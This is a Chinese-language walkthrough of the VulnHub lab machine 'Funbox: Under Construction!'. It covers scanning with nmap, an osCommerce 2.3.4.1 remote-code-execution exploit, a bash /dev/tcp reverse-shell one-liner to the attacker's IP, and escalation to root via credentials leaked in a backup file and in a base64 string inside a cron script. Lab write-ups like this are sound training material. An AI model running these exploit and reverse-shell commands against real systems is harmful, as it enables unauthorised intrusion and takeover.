vulnhub靶场之FUNBOX: UNDER CONSTRUCTION!

准备：

攻击机：虚拟机kali、本机win10。

靶机：Funbox: Under Construction!，下载地址：https://download.vulnhub.com/funbox/Funbox10.ova，下载后直接vbox打开即可。

知识点：osCommerce框架漏洞、pspy64查看定时任务、敏感信息泄露。

信息收集：

通过nmap扫描下网段内的存活主机地址，确定下靶机的地址：nmap -sn 172.20.10.0/24，获得靶机地址：172.20.10.6。

扫描下端口对应的服务：nmap -T4 -sV -p- -A 172.20.10.6，显示开放了22、25、80、110、143端口，开启了ssh服务、http服务、smtp服务、pop3服务、imap服务。

目录扫描：

使用dirsearch进行目录扫描，发现catalog目录和一些其他文件、目录信息。

WEB信息收集：

访问下web服务：http://172.20.10.6/，并检查其源代码信息，但是未发现有效信息。

访问下扫描出来的目录：http://172.20.10.6/catalog，发现框架信息：osCommerce，版本信息：v2.3.4.1。

那就使用searchsploit搜索下osCommerce框架v2.3.4.1版本的漏洞信息，发现以下命令执行漏洞。

漏洞获取shell：

查看下该exp的利用方式，发现其利用方式为：python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog。

进行shell反弹时发现不能使用单引号字符，否则会终止rec_shell，尝试改成双引号成功反弹shell，命令：bash -c "bash -i >& /dev/tcp/172.20.10.7/6688 0>&1"。

提权：

在当前目录下的configure.php.bak文件中发现一组账户和密码：jack/yellow，但是切换该账户或ssh连接该账户均是失败。

上传pspy64并执行该脚本（赋予执行权限：chmod +x pspy64），发现会执行：/bin/sh -c /usr/share/doc/examples/cron.sh。

查看下该文件信息，命令：cat /usr/share/doc/examples/cron.sh，发现base64加密的字符串：LXUgcm9vdCAtcCByZnZiZ3QhIQ==，对该字符串解密，成功获得root账户信息：root/rfvbgt!!。

但是建立新的ssh连接，仍是无法直接连接，应该是配置中禁止了使用ssh协议+密码进行登录，使用python升级下shell：python -c 'import pty; pty.spawn("/bin/bash")'，然后切换root账户：su root，成功获得root权限。

获得root权限后，在/root目录下发现root.txt文件，读取该文件成功获取到flag值。